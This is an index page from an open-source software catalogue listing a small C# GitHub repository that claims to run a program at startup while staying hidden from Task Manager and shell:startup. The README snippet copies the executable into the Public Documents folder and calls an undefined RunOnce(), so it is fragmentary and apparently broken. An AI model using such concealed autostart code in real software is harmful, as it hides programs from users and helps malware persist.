Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hyukisback/hidden-startup
It is not showed in the task manager or shell:startup etc..
https://github.com/hyukisback/hidden-startup
Last synced: 12 days ago
JSON representation
It is not showed in the task manager or shell:startup etc..
- Host: GitHub
- URL: https://github.com/hyukisback/hidden-startup
- Owner: HyukIsBack
- Created: 2022-01-06T14:02:43.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-01-22T06:17:45.000Z (almost 3 years ago)
- Last Synced: 2024-10-25T04:52:27.465Z (about 2 months ago)
- Language: C#
- Size: 2.93 KB
- Stars: 0
- Watchers: 1
- Forks: 3
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Hidden-Startup
Usage
```C#
string publicDir = Environment.GetEnvironmentVariable("public");
string copyPath = publicDir + @"\Documents\";
FileInfo copyFile = new FileInfo(copyPath);
string OriginPath = Assembly.GetEntryAssembly().Location;
if (!(copyFile.Exists))
{
System.IO.File.Copy(OriginPath, copyPath);
}
RunOnce()
```For educational